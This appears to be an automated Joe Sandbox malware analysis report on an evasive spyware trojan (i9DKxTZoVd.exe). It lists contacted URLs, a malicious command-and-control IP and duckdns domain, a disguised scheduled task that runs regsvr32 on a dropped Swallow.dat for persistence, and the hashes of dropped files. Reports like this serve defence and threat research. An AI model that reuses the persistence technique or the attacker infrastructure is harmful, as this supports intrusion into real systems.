                                          https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.101798259193.000002A4DE8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.101779809519.000002A4CFD3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101896209492.0000025DB1525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA29A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101994038719.000001E26D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 0000000C.00000002.101837470212.0000025DA2853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.quovadis.bm0powershell.exe, 0000000A.00000002.101802236942.000002A4E6A5F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101905223523.0000025DB99C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gameplayapi.intel.com/api/games/downloadthumbnail/regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://tst-gameplayapi.intel.com/api/games/getagsgames2/regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.intel.com/support/gfx_feedbackx;regsvr32.exe, 00000009.00000003.101734444126.0000000005319000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005319000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.00000000055AB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.000000000584B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://aka.ms/pscore68powershell.exe, 0000000A.00000002.101779809519.000002A4CE851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA14B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D2A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.remobjects.com/psi9DKxTZoVd.exe, 00000000.00000003.101663444971.0000000002500000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.exe, 00000000.00000003.101663862917.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.tmp, 00000001.00000000.101665254233.0000000000401000.00000020.00000001.01000000.00000004.sdmp, i9DKxTZoVd.tmp.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://gameplayapi.intel.com/api/games/getagsgamesettings2/.regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ocsp.quovadisoffshore.com0powershell.exe, 0000000A.00000002.101802236942.000002A4E6A5F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101905223523.0000025DB99C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/.regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.intel.com/support/gfx_feedbackregsvr32.exe, 00000009.00000003.101952377109.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.101779809519.000002A4CE851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA14B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D2A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://cacerts.digicregsvr32.exe, 0000000E.00000003.101876266085.00000000053B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://oneget.orgpowershell.exe, 0000000C.00000002.101837470212.0000025DA256D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://gameplayapi.intel.com/api/games/getagsgames2/regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            88.99.161.62
                                                            1hvnc.duckdns.orgGermany
                                                            24940HETZNER-ASDEtrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1572121
                                                            Start date and time:2024-12-10 06:58:07 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 33s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Run name:Suspected VM Detection
                                                            Number of analysed new started processes analysed:17
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:i9DKxTZoVd.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@26/24@1/1
                                                            EGA Information:
                                                            • Successful, ratio: 33.3%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 41
                                                            • Number of non-executed functions: 50
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 4292 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 5652 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            TimeTypeDescription
                                                            01:00:22API Interceptor47x Sleep call for process: powershell.exe modified
                                                            01:00:59API Interceptor1169133x Sleep call for process: regsvr32.exe modified
                                                            07:00:29Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB} path: regsvr32 s>/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            88.99.161.62SecuriteInfo.com.Win32.DropperX-gen.20947.10834.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              HETZNER-ASDEList of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              • 213.239.239.164
                                                              2704IeeQyo.exeGet hashmaliciousSmokeLoaderBrowse
                                                              • 188.40.141.211
                                                              e6reA52T4I.exeGet hashmaliciousSmokeLoaderBrowse
                                                              • 188.40.141.211
                                                              x.ps1Get hashmaliciousPureLog Stealer, QuasarBrowse
                                                              • 178.63.102.185
                                                              32%20VPN.exeGet hashmaliciousAsyncRATBrowse
                                                              • 136.243.179.5
                                                              222.exeGet hashmaliciousNjratBrowse
                                                              • 136.243.179.5
                                                              600%202024.exeGet hashmaliciousPureLog StealerBrowse
                                                              • 178.63.102.185
                                                              xhost.vbsGet hashmaliciousUnknownBrowse
                                                              • 136.243.179.5
                                                              800.vbsGet hashmaliciousUnknownBrowse
                                                              • 136.243.179.5
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSekpL8Z26C.exeGet hashmaliciousUnknownBrowse
                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\Desktop\i9DKxTZoVd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1160704
                                                                              Entropy (8bit):6.3941502469827425
                                                                              Encrypted:false
                                                                              SSDEEP:24576:MYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XU:3GUhni7iSFCQGu
                                                                              MD5:14C6FA8E50B4147075EB922BD0C8B28D
                                                                              SHA1:0FAAD18B0E26CE3B5C364621A4F0AEE9DB56A9A7
                                                                              SHA-256:90C4A61AF494B63ECFE1226714175675A4E49E57D50718491B3BC8FE29DD8FC7
                                                                              SHA-512:E6C35BBCAA9A8BB306E58BB91AADF5FEED6B1AD1DF6EE0E68BF3BAE9B76D84C862B4EE9DD87A1D288FE1B7AAAAC13467964436A09EC529F67AF50905CD0EF876
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                              Joe Sandbox View:
                                                                              • Filename: SekpL8Z26C.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6144
                                                                              Entropy (8bit):4.215994423157539
                                                                              Encrypted:false
                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                              MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                              SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                              SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                              SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):23312
                                                                              Entropy (8bit):4.596242908851566
                                                                              Encrypted:false
                                                                              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\i9DKxTZoVd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1160704
                                                                              Entropy (8bit):6.3941502469827425
                                                                              Encrypted:false
                                                                              SSDEEP:24576:MYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XU:3GUhni7iSFCQGu
                                                                              MD5:14C6FA8E50B4147075EB922BD0C8B28D
                                                                              SHA1:0FAAD18B0E26CE3B5C364621A4F0AEE9DB56A9A7
                                                                              SHA-256:90C4A61AF494B63ECFE1226714175675A4E49E57D50718491B3BC8FE29DD8FC7
                                                                              SHA-512:E6C35BBCAA9A8BB306E58BB91AADF5FEED6B1AD1DF6EE0E68BF3BAE9B76D84C862B4EE9DD87A1D288FE1B7AAAAC13467964436A09EC529F67AF50905CD0EF876
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 2%
